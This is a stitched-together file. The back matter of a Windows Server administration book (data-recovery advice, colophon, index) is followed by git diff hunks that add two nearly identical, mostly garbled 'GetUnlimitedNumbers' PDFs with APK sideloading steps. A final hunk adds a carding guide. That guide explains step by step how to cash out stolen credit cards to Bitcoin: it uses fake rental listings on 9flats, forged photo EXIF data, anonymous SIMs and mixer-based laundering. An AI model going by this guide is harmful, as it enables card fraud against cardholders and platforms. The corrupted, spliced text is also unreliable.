+A corrupted boot sector or master boot sector
+Try using the Recovery Console and repairing the
+problem.
+A missing or corrupt system file
+Try using the Recovery Console and copying the file
+from a Windows Startup Disk or from the installation files
+on CD or a distribution point.
+Registry corruption
+Try using the Emergency Repair Process to restore the
+Registry or restore the System State from tape backup
+media using Safe Mode.
+Massive corruption or loss of system files or the Registry
+Try the Automated System Recovery (ASR) feature of
+Windows Server 2003 if you previously created an ASR
+backup set; otherwise, rebuild your server from scratch
+by reinstalling Windows.
+
+Hack 100 Data Recovery of Last Resort
+When the hard drive crashes on your server and your tape
+backup turns out to be a dud, who you gonna call? Use this hack.
+You have critical data on your server and your hard drive
+crashes. And you haven't made a backup recently. What do you
+do? I know, not making regular backups is irresponsible, but
+these things happen. Or perhaps you have a RAID 5 unit and the
+unimaginable happens: two drives fail simultaneously. And
+Friday's backup tape is unreadable, because you haven't
+cleaned the tape drive for over a year. Another example of being
+irresponsible, but let's lay aside the blame until we fix the
+problem, okay? So, what do you do?
+You need a data recovery companyfast. I know seasoned
+administrators who have been in this unfortunate situation, and
+here's a list of companies they've recommended to me that you
+can try if this ever happens to you:
+Ontrack
+A popular data-recovery service provider that offers
+various levels of services, including in-house, remote,
+and do-it-yourself. They also have a partner program
+that offers discounts based on referrals and resale. They
+have worldwide locations in the US, Europe, and Tokyo.
+Their web site is http://www.ontrack.com.
+
+DriveSavers
+An industry leader in data recovery that offers free
+estimates. They also have a terrific list of tips on their
+site (http://www.drivesavers.com), explaining how to
+anticipate and prevent drive problems before they occur.
+ActionFront
+An ISO 9001:2000 Certified company with data
+recovery labs in Atlanta, Santa Clara, and Toronto. On
+their web site (http://www.actionfront.com), you'll find a
+free 22-page Data Emergency Guide you can download,
+and it's definitely worth a read.
+These are only a few of the many data recovery services out
+there, but they come highly recommended by competent IT
+professionals I know personally, so I pass them on to you.
+However, you should know that data recovery usually isn't
+cheap, so clean that tape drive regularly if you don't want to
+break your IT budget!
+By the way, if you've ever had to use a data-recovery service
+yourself and would like to recommend them, feel free to post a
+comment on this book's web page
+(http://www.oreilly.com/catalog/winsvrhks/).
+
+Colophon
+Our look is the result of reader comments, our own
+experimentation, and feedback from distribution channels.
+Distinctive covers complement our distinctive approach to
+technical topics, breathing personality and life into potentially
+dry subjects.
+The tool on the cover of Windows Server Hacks is a squeegee,
+which dates back to the Middle Ages, when fishermen used a
+wooden ancestor of this tool called a squilgee to scrape fish
+entrails off the decks of their boats. In Moby Dick , author
+Herman Melville writes of the whaler's tool known as a nipper,
+describing them as 'leathern' squilgees cut from the tail of a
+whale. In Melville's story, not only does this precursor to the
+squeegee clean whale oil from the deck, but 'by nameless
+blandishments, as of magic, allures along with it all impurities.'
+The modern squeegee was born at the turn of the 20th century,
+when window washers began using a 'Chicago squeegee.' This
+heavy steel contraption used two rubber blades, held into place
+by 12 screws. While easier to use than implements made of
+wood and whale tails, it was far from perfect. One window cleaner,
+Ettore Steccone, set out to improve the squeegee, and in 1936
+he patented a device called the New Deal. This squeegee, now
+called the Ettore, is still in wide use by professional window
+cleaners today. Though Steccone eventually lost his patent, the
+light weight and distinctive single slit-cut rubber blade of his
+tool served as a blueprint for all squeegees that followed.
+Philip Dangler was the production editor and proofreader for
+Windows Server Hacks. Brian Sawyer was the copyeditor. Marlowe
+Shaeffer, Mary Brady, and Darren Kelly provided quality control.
+Johnna VanHoose Dinse wrote the index.
+Hanna Dyer designed the cover of this book, based on a series
+
+design by Edie Freedman. The cover image of a squeegee is an
+original photgraph by Hanna Dyer. Emma Colby produced the
+cover layout with QuarkXPress 4.1 using Adobe's ITC
+Garamond and Helvetica Neue fonts.
+David Futato designed the interior layout. Andrew Savikas
+converted this book to FrameMaker 5.5.6 with a format
+conversion tool created by Erik Ray, Jason McIntosh, Neil Walls,
+and Mike Sierra that uses Perl and XML technologies. The text
+font is Linotype Birka; the heading font is Adobe Helvetica Neue
+Condensed; and the code font is LucasFont's TheSans Mono
+Condensed. The illustrations that appear in the book were
+produced by Robert Romano and Jessamyn Read using
+Macromedia FreeHand 9 and Adobe Photoshop 6. This colophon
+was written by Philip Dangler.
+The online edition of this book was created by the Safari
+production group (John Chodacki, Becki Maisch, and Madeleine
+Newell) using a set of Frame-to-XML conversion and cleanup
+tools written and maintained by Erik Ray, Benn Salter, John
+Chodacki, and Jeff Liggett.
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+account information searches, Active Directory
+account management, Active Directory users
+accounts
+Active Directory, listing disabled
+administrator, renaming
+guest, renaming
+inactive, retrieving
+no expiration
+users, preventing local
+ActionFront, data recovery
+Active Directory
+accounts, listing disabled
+contact information, storing/displaying
+
+DC (Domain Controller), checking existence
+domains
+list all computers
+listing
+information display
+OUs
+control delegation
+creating automatically
+creation automation
+object modification
+sending information to HTML page
+site assigned, viewing
+trust relationships, listing
+users
+account expiration
+account information searches
+account management
+
+disabling domain account
+name change
+Windows 2000, unlocking domain account
+Windows XP icon restore
+ADM files
+administrator
+account renaming, security
+domain controller access
+local, listing
+AdminScripts folder
+ADSI (Active Directory Services Interface)
+adsutil.vbs administrative script
+ADUC (Active Directory Users and Computers) console
+aging, DDNS
+antivirus software
+archivelogs.vbs code
+AspAllowSessionState property, metabase hacks
+
+AspBufferingOn property, metabase hacks
+AspProcessorThreadMax property, metabase hacks
+AspQueueConnectionTestTime property, metabase
+hacks
+AspScriptFileCacheSize property, metabase hacks
+AspThreadGateEnabled property, metabase hacks
+ASR (Automated System
+Recover)
+backups and
+assessment tools, security
+attribution for use of code examples
+auditing tools, security
+automatic log on
+after booting
+configuration
+manual
+script method
+
+Sysinternals
+Automatic Updates
+FAQ
+Group Policy and
+patches and
+awareness, security and
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+Backup Operators
+Server Operators and
+Backup utility
+bks files
+CAs
+backups
+access restriction
+ASR and 2nd
+CA
+CAs
+command line, individual files
+configuration
+local computers
+
+remote computers
+DFS namespace 2nd
+DHCP databases
+EFS keys
+ER files, collecting
+Event logs
+last resorts
+metabase (IIS)
+quick backups
+Recovery Agent keys
+recovery file collection
+security
+shadow copies
+System State
+remote computers
+bks files
+boot disk, creating for network
+
+boot up, automatic log on
+businesses, security FAQ
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+CacheISAPI property, metabase hacks
+CAs (certificate authorities)
+backups 2nd
+decommissioning
+restores
+Certification Authority Backup Wizard
+certification, anti-virus software
+Chaccess.vbs administrative script
+ChangeIP.vbs code
+ChangeWINS.vbs code
+CheckMembership.vbs
+Cipher Security Tool for Windows 2000
+CIW (Client Installation Wizard), RIS and
+
+CIW (Client Installation Wizards), RIS and
+code examples in this book, use of
+code listings
+archivelogs.vbs
+ChangeIP.vbs
+ChangeWINS.vbs
+CheckMembership.vbs
+CreateOU.wsf
+CreateUserHomeDirectory.vbs
+DelegateOU.vbs
+DeleteOldComputers.vbs
+DisabledAccounts.vbs
+Disaster.bat
+EnumerateHotfixes.vbs
+ExportAdUsers.vbs
+FindUser.vbs
+GetAccountInfo.vbs
+
+GetAdmins.vbs
+GroupMember.vbs
+LogoffIcon.vbs
+ModifyUsers.vbs
+ModifyUsersOU.vbs
+OU2HTML.vbs
+PassList.bat
+PWDNeverExpired.vbs
+ReadList.bat
+ReleaseRenew.vbs
+ServerList.txt
+Static2DHCP.vbs
+vbtree.vbs
+command line
+backup individual files
+printer management
+Registry keys find and replace
+
+Run As
+Windows component removal
+commands, executing on each computer in domain
+computer accounts, retrieving inactive
+computer name, printer management and
+computers
+automatic logon enabled
+finding
+finding, security
+listing all on domain, Active Directory
+CON2PRT command
+configuration
+anti-virus software
+backups
+local computers
+remote computers
+log on, automatic
+
+networks, changing with Netsh
+remote computers, displaying
+RIS
+consumers, security FAQ
+contact information, storing/displaying in Active Directory
+CreateOU.wsf code
+CreateUserHomeDirectory.vbs code
+CSV files
+group membership and
+password expiration
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+Data Replicator
+databases
+DHCP
+backups
+recovering
+WINS, recreating damaged
+DC (Domain Controller), checking existence of
+DDNS (Dynamic DNS)
+aging
+scavenging
+default printers, setting based on location
+DelegateOU.vbs code
+delegating, OU control
+
+DeleteOldComputers.vbs code
+DesktopChecker
+DFS (Distributed File System), namespace backups
+2nd
+DFScmd utility
+DFSUtil
+DHCP (Dynamic Host Configuration Protocol)
+databases
+backups
+recovering
+scavenging and
+servers
+availability
+redundant, installing
+static IP, changing from
+directory trees, displaying
+disabled accounts, listing in Active Directory
+
+DisabledAccounts.vbs code
+disabling EFS
+Disaster.bat code
+DNS (Domain Name System)
+error messages
+newsgroups
+troubleshooting
+domain controllers, admin access
+domains
+account disabling, Active Directory
+Active Directory
+list all computers
+listing
+computers, executing command on each
+users, searching for
+downloading
+scripting engine
+
+scripts
+drag and drop to Run menu
+drive mapping
+logon script information
+network drives
+renaming
+shared folders
+DriveSavers, data recovery
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+EFS (Encrypted File System)
+backups
+disabling
+keys
+backups 2nd
+restores
+encryption
+data backups
+EFS, disabling
+enterprise patch management
+EnumerateHotfixes.vbs code
+environment variables
+adding
+
+removing
+retrieving
+ER (Emergency Repair)
+files
+collecting
+winmsd.exe utility and
+rdisk.exe and
+error messages, DNS
+Event logs
+backups
+clearing
+information script
+EventCombMT tools
+example code from this book, use of
+executables, Run As and
+expiration
+passwords, checking for non-expired
+
+user accounts
+ExportAdUsers.vbs code
+extending Group Policy
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+FAQs
+Automatic Updates
+patch management
+security
+Windows Update
+file types blocked, security
+files
+ADM
+EFS, disabling
+usage monitoring
+find and replace in command line, Registry keys
+FindUser.vbs code
+folders
+
+AdminScripts
+EFS, disabling
+shared, drive mapping
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+GetAccountInfo.vbs code
+GetAdmins.vbs code
+government security clearance
+GPO (Group Policy Object)
+group membership
+enumerating to CSV file
+logon script information
+Group Policy
+ADM files
+Automatic Updates and
+extending
+GroupMember.vbs code
+guest account, renaming
+
+GUI
+IIS 5 and
+IIS 6 and
+Run As and
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+hiding/showing metabase
+HotFix & Security Bulletin Service
+hotfixes
+downloadable
+listing installed
+HTML, OU display
+Hyena utility, file use and
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+icons, logoff on desktop
+ID 36907, metabase hacks
+IIS (Internet Information
+Services)
+administration scripts
+introduction
+metabase backup
+web servers, running
+IIS 5
+administration scripts
+metabase backups, restoring
+metabase, location map
+socket pooling, disabling
+
+IIS 6
+administrative scripts
+metabase
+backups
+location map
+restoring backups
+XML Map
+socket pooling, disabling
+IISFAQ web site
+inactive accounts
+retrieving
+installation
+RIS
+Windows components
+Instant Network Boot Disk
+interception, security and
+intrustion detection tools
+
+IP (Internet Protocol)
+adapter information, changing
+static, switching to DHCP
+IP addresses
+releasing
+renewing
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+KB 824146 Scanning Tool
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+local accounts, preventing user creation
+local administrators, listing
+local machines, backup configuration
+lockdown tools, security
+log on
+automatic
+after booting
+finding enabled computers
+manual configuration
+script method
+Sysinternals
+printer management based on computer name
+logical structure of metabase
+
+logoff icons, placing on desktop
+LogoffIcon.vbs code
+logon scripts
+drive mapping information
+membership checking
+Lost Password Recovery
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+mapped drives
+logon script information
+renaming
+mapping drives
+network drives
+shared folders
+mapping metabase
+mappings, group membership and
+MaxEndPointConnections property, metabase hacks
+MBSA (Microsoft Baseline Security Analyzer)
+support
+membership, logon script information
+metabase
+
+backing up
+quick backups
+hacks
+hiding
+logical structure
+management scripts
+mapping
+physical structure
+restoring
+Windows Backup utility
+MetaEdit
+Microsoft
+security and
+reporting
+tools
+ModifyUsers.vbs code
+ModifyUsersOU.vbs
+
+MSRC ratings system
+myITforum.com
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+Netsh
+network configuration
+network configuration settings
+network adapters
+IP information
+WINS settings
+Network View
+networks
+anti-virus software
+boot disk, creating
+configuration, changing with Netsh
+drive mapping
+file useage
+
+NICs, removing orphaned
+printers, connecting to shared
+Run As and
+service managment, remote machines
+virus-free
+newsgroups, DNS
+NICs (network interface cards)
+orphaned, removing
+two-NIC environment, NLB and
+NLB (Network Load Balancing), implementing
+ntbackup, command line and
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+Ontrack, data recovery
+organization of book
+orphaned NICs
+removing
+OU2HTML.vbs code
+OUs (organizational units)
+control delegation
+creating, automating
+HTML page display
+objects, modifying
+users
+property modification
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+PassList.bat code
+passwords
+expiration, checking for non-expired
+Lost Password Recovery tool
+policies
+users changing
+patch management
+best practices
+enterprise patch management
+FAQ
+introduction
+policies
+processes
+
+tools 2nd
+vulnerable systems and
+patches
+Automatic Updates 2nd
+business impact
+distribution
+email notification
+flavors
+hotfixes
+downloadable
+MSRC ratings system
+order of application
+roll-ups
+service packs
+SMS
+SUS
+testing
+
+Windows Update FAQ
+permissions for using code examples
+permissions, user configuration
+physical structure of metabase
+PPP (Policy, Process, Persistence)
+Print Manager Plus
+printers
+computer name and
+default, setting based on location
+managing automatically
+mappings, group membership and
+network, connecting to shared
+Printers folder, Run As
+processes, finish before terminating
+PWDNeverExpired.vbs
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+QChain
+quick backups, metabase
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+rdisk.exe, ER files
+ReadList.bat code
+recovery
+ASR (Automated System Recover)
+file collection
+startup troubleshooting
+Recovery Agents, key backups
+redundant DHCP servers, installing
+Regfind utility 2nd
+Registry keys, find and replace in command line
+ReleaseRenew.vbs code
+releasing IP addresses
+Remote Assistance, shortcuts to
+
+remote computers
+backups
+configuration
+System State
+configuration display
+network services, managing
+shut down
+renaming mapped drives
+renewing IP addresses
+Restore Groups
+restores
+CAs
+EFS keys
+metabase
+RFCs (Request For Comments)
+RIS (Remote Installation Services)
+CIW And
+
+configuration
+customizing
+installation
+overview
+predefining computer accounts
+system requirements
+tuning
+Windows images deployment
+roll-ups
+Run As 2nd
+command line
+executables and
+GUI and
+limitations
+network shares and
+Printers folder
+shortcuts
+
+Task Manager
+Windows Explorer and
+Run menu, drag and drop to
+RUNDLL32 command
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+scanning
+anti-virus software
+tools for
+scavenging, DDNS
+scripting engine, downloading
+scripts
+automatic logon
+downloading
+event log information
+IIS administration
+running remotely
+testing
+VB, WMI agents and
+
+[See Run As]
+Secondary Logon service
+Secure Sockets Layer, clearing
+security
+administrator
+account renaming
+local, listing
+antivirus FAQ
+assessment tools
+auditing tools
+awareness and
+Backup Operators
+backups
+computers, finding
+domain controllers, admin access
+FAQ
+file types blocked
+government clearance
+
+guest account, renaming
+interception and
+intrusion detection tools
+lockdown tools
+Microsoft
+reporting
+tools
+password policies
+patch management tools
+reporting to government authorities
+software update tools
+virus protection
+FAQ 2nd
+tools
+virus-free networks
+vulnerability
+Server Monitor Lite
+
+Server Operators, Backup Operators and
+ServerList.txt code
+ServerListenBacklog property, metabase hacks and
+service packs
+Services node, remote machine management
+shadow copies
+backups and
+implementation
+uses
+shared folders, drive mapping
+shortcuts
+to Remote Assistance
+Run As
+shut down remote computers
+SMS (Systems Management Server)
+socket pooling
+disabling
+
+IIS 5
+IIS 6
+reasons for
+software update tools, security
+SQL Server 2000 Security tools
+startup, troubleshooting
+static IPs, DHCP switch
+Static2DHCP.vbs code
+SUS (Software Update Services)
+patches and
+Sysinternals, auto log on
+SysPrep, Windows deployment and
+system requirements, RIS
+System State, backups
+remote computers
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+Task Manager, Run As and
+termination, finish process prior to
+testing scripts
+third-party tools
+Data Replicator
+Lost Password Recovery
+myITforum.com
+Network View
+Server Monitor Lite
+VNC (Virtual Network Computing)
+tools
+DNS troubleshooting
+patch management
+
+third-party
+Data Replicator
+Lost Password Recovery
+myITforum.com
+Network View
+Server Monitor Lite
+VNC
+trust relationships, listing in Active Directory
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+updates
+tools for
+UrlScan Security Tool
+users
+account information search, Active Directory
+accounts, no expiration
+Active Directory
+account management
+disabling domain account
+name changes
+groups, enumerating membership to CSV file
+home directory configuration
+local accounts, preventing creation
+
+membership, logon script information
+OU, properties modification
+passwords, changing
+permissions, configuring
+searching for
+utilities
+Hyena, file use
+Regfind
+regfind.exe
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+variables
+environment
+adding
+removing
+retrieving
+vbtree.vbs code
+virus protection
+FAQ
+tools
+virus-free networks
+anti-virus software
+basics
+file types blocked
+
+interception and
+VNC (Virtual Network Computing)
+VSS (Volume Shadow Copy
+Service)
+backups and
+implementing copies
+shadow copy uses
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+web applications, administrative scripts
+Web Server Lockdown Wizard
+web servers, IIS and
+web sites
+administrative scripts
+DNS troubleshooting tools
+IISFAQ
+Windows
+command line, removing components
+deployment, SysPrep and
+image deployment, RIS and
+installing components, unattended
+Windows 2000, locking accounts
+
+Windows 2000/3000, implementing NLB
+Windows Backup utility, metabase
+Windows Explorer, Run As and
+Windows NT, recreating WINS databases
+Windows Server 2000/3000, recreating WINS databases
+Windows Update
+catalog
+controls, manual install
+Critical Updates, personalizing
+FAQ
+information collection
+removing items
+schedule changes
+Secure Sockets Layer and
+Windows XP Active Directory icon restore
+winmsd.exe utility, ER files and
+WINS (Windows Internet Name Service)
+
+databases, recreating damaged
+settings, changing for all adapters
+WMI (Windows Management
+Instrumentation)
+agents, VB scripts and
+IIS administration
+workstation, printer settings
+WSH (Windows Scripting Host), IIS administration
+
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+A B C D E F G H I K
+[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
+L M N O P Q R S T U
+[ ] [ ] [ ]
+V W X
+XML metabase map, IIS 6
diff --git a/[Sacky]GetUnlimitedNumbers 2_pdf.md b/[Sacky]GetUnlimitedNumbers 2_pdf.md
new file mode 100644
index 0000000..86b2551
--- /dev/null
+++ b/[Sacky]GetUnlimitedNumbers 2_pdf.md
@@ -0,0 +1,51 @@
+# [Sacky]GetUnlimitedNumbers 2
+
+
+---
+
+�������� ������������� ����
+������
+�� ����� ��� ������� ���������� ���� ����� �������� w ����������������
+�� ������ �����!��"����������������#$%$
+&�������� ��'������������������ ������������� ����!������������
+(�����)����
+���������*�+���,�����-���.+-����/
+'�������������������%"'��,0 �
+�������1�����������20
+"���� ����������� �����'3�������������'3���������������3�������������3���������������������������
+4��* '����� 0� �� 0�������3 ��� 0������� &��������� �� ������0"������������,��"������������
+���� ��������������������������� �����!�������5�����������������������'�,0 ����%"'��������3�
+����� �������������������������������6���3��������� �����!���&���������5���������������������5�������
+����������
+
+5�������5������������
+7� �������&������'������4����������
+*� 8�����������9&��������������������9������� 6�3���������� �����������
+,� ���������������������
+-� �������6� 3�������$����3��������4������
+:� ������� �������
++� �������8����3������ �����;�������������$����
+<� �������=���
+2� �������$�����������73�����������,�������-��8����������>"�����������?��������;��
+@� 8�������������������������!("���������������6�
+7A�8����������>������� ��������������������������0���*�����������B?��������;��
+77�"���������������������������������������!��������������%������������������������������
+C����������������������������'�������������������
+7*�6� ��������%�����
+7,���������'�!�������D�������'8����E�6��#8�"�������������(����������������������
+����� ���� �����!�� ��F������G
+7-�0�����'�����5�����5����������������������������� ����
+7:�����������"��������������������5������ �����������������������������������������������������
+�����������������������F���������������>(����������� �����!�?���������������������
+.���������/��8�������������������������� ��������� ����������������������������
+7+� !����5�����������w����������������e�e�����s�������w�������������s�APK1�APK2
+7<� 5�������APK1. Tap APK2 and select Install with the A icon next to it. Leave options as is and install.
+72� Open Numbers app. ��������w��������w����������;�����������������������������������������������
+https://temp-inbox.me/temp-gmail
+7@��������� ����������� ����������&���������4�������������������� ��������������������������
+"������������������������������������8�������������������������������������������
+*A�I��������������������������� �����5� ������������������������������������������������
+�� ������������������������
+You can skip to step 16 and only do the last 4 steps if you have an android phone.
+$�J��G
+������
diff --git a/[Sacky]GetUnlimitedNumbers_pdf.md b/[Sacky]GetUnlimitedNumbers_pdf.md
new file mode 100644
index 0000000..fae4a4c
--- /dev/null
+++ b/[Sacky]GetUnlimitedNumbers_pdf.md
@@ -0,0 +1,51 @@
+# [Sacky]GetUnlimitedNumbers
+
+
+---
+
+�������� ������������� ����
+������
+�� ����� ��� ������� ���������� ���� ����� �������� w ����������������
+�� ������ �����!��"����������������#$%$
+&�������� ��'������������������ ������������� ����!������������
+(�����)����
+���������*�+���,�����-���.+-����/
+'�������������������%"'��,0 �
+�������1�����������20
+"���� ����������� �����'3�������������'3���������������3�������������3���������������������������
+4��* '����� 0� �� 0�������3 ��� 0������� &��������� �� ������0"������������,��"������������
+���� ��������������������������� �����!�������5�����������������������'�,0 ����%"'��������3�
+����� �������������������������������6���3��������� �����!���&���������5���������������������5�������
+����������
+
+5�������5������������
+7� �������&������'������4����������
+*� 8�����������9&��������������������9������� 6�3���������� �����������
+,� ���������������������
+-� �������6� 3�������$����3��������4������
+:� ������� �������
++� �������8����3������ �����;�������������$����
+<� �������=���
+2� �������$�����������73�����������,�������-��8����������>"�����������?��������;��
+@� 8�������������������������!("���������������6�
+7A�8����������>������� ��������������������������0���*�����������B?��������;��
+77�"���������������������������������������!��������������%������������������������������
+C����������������������������'�������������������
+7*�6� ��������%�����
+7,���������'�!�������D�������'8����E�6��#8�"�������������(����������������������
+����� ���� �����!�� ��F������G
+7-�0�����'�����5�����5����������������������������� ����
+7:�����������"��������������������5������ �����������������������������������������������������
+�����������������������F���������������>(����������� �����!�?���������������������
+.���������/��8�������������������������� ��������� ����������������������������
+7+� !����5�����������w����������������e�e�����s�������w�������������s�APK1�APK2
+7<� 5�������APK1. Tap APK2 and select Install with the A icon next to it. Leave options as is and install.
+72� Open Numbers app. ��������w��������w����������;�����������������������������������������������
+https://temp-inbox.me/temp-gmail
+7@��������� ����������� ����������&���������4�������������������� ��������������������������
+"������������������������������������8�������������������������������������������
+*A�I��������������������������� �����5� ������������������������������������������������
+�� ������������������������
+You can skip to step 16 and only do the last 4 steps if you have an android phone.
+$�J��G
+������
diff --git a/allCC2_pdf.md b/allCC2_pdf.md
new file mode 100644
index 0000000..fc2bf0b
--- /dev/null
+++ b/allCC2_pdf.md
@@ -0,0 +1,132 @@
+# allCC2
+
+
+---
+
+Last update : January 2nd 2017 (translated from French).................... Exclusive method
+How to cashout all CCs to BTC
+(exclusive and easiest method)
+INTRODUCTION:
+First I would like to thank you for purchasing this guide
+and wish you good luck on your cashout aventures :)
+Everything I wrote here is from personal
+experience, I tried my best to explain everything as
+clearly as possible and not forget any details but if
+something isn't clear send me a PM and I'll be
+glad to answer any questions.
+
+Before starting you will need :
+✔ CCs
+✔ ANON sim cards (1 per renter and 1 per
+customer)
+✔ Your computer (of course :p)
+✔ « Photo Exif Editor App » (runs with Androïd,
+free app)
+✔ Anon Offshore CC with IBAN attached (optionnal
+but very useful for quick big cashouts)
+Summary :
+1) Your renter account
+2) Preparation
+3) Your listing
+4) Wait
+5) Your customer account
+6) Booking and cashout
+7) Clean your Bitcoins
+8) Tricks
+
+Now let’s start.
+This method will allow you to cashout all CCs to
+BTC easily with fake listings on 9flats.com ;-)
+9flats works in Europe & America, have no
+security (but it would be better if you use VPN,
+SOCKS5 etc..) no chargebacks and bitcoins are
+accepted.
+Now I am going to explain you step by step the
+process.
+1) Day 1 : Open an account (renter) on 9flats with
+a fake e-mail address, during the first 3 days log-in
+your account and visit the website, take quick
+looks on the listings (act like a real renter ).
+2) During these 3 days, you will need to pick up
+some pictures of flats for rent (the best way is
+groups on Facebook).
+Once you have your pictures, you will need to
+change the exif datas (use « Photo exif editor » for
+
+that), to the geolocation of your fake listing (use a
+real geolocation, google maps is your friend) and
+very important change also the info « photo taken
+the … » and chose a date during these 3 days (very
+good to increase your scoring) and don’t forget
+your pics in .jpg (important ! ! )
+3) After these 3 days create your listing on 9flats,
+the best way is to make a good standing flate in a
+chic place (approx $150 - $200 per day)
+Be a comedian ! Put periods of unaviability to look
+like to a regular renter.
+After that you will need to wait 48h to 72h before
+your rental ad is online.
+4) After 72h max your ad is online, good ! Log-in
+sometimes everyday (or every 2 days) during 1
+week to look like as same as a normal renter.
+5) 1 week after Day 1 open a customer account
+(name must be as same as cc holder of course),
+act like a real customer, take your time to visit ads
+near the area of your fake flat, ask questions to
+other renters (4 days), after the 4th day : Card
+
+your own ad and don’t forget to contact the fake
+renter (you ! ) before, ask some questions etc…
+6) Once your fake booking is OK, you will receive
+an e-mail from 9flats, again be clever, log to your
+9flats account by the link provided on your e-mail
+from 9flats, but it would be better if you let few
+hours before your booking and your cashout.
+At the cashout the options are : Bank wire or
+Bitcoins, of course choose bitcoins.
+7) The best way to clean your dirty BTC is grams
+they provide a new adress every 10 hours.
